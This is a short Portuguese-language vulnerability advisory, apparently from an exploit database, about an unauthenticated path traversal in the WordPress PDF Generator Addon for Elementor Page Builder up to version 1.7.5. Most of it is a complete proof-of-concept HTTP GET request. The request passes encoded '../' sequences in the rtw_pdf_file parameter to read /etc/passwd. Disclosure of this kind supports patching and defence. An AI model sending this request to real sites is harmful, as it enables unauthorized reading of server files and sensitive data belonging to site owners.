
Addon Gerador de PDF para Elementor Page Builder <= 1.7.5 - Download Arbitrário de Arquivo Não Autenticado
PDF Generator Addon para Elementor Page Builder <= 1.7.5 - Download Arbitrário de Arquivos Não Autenticado
O plugin PDF Generator Addon para Elementor Page Builder do WordPress é vulnerável a Path Traversal em todas as versões até, e incluindo, 1.7.5 através da função rtw_pgaepb_dwnld_pdf(). Isso permite que atacantes não autenticados leiam o conteúdo de arquivos arbitrários no servidor, que podem conter informações sensíveis.
GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Priority: u=0, i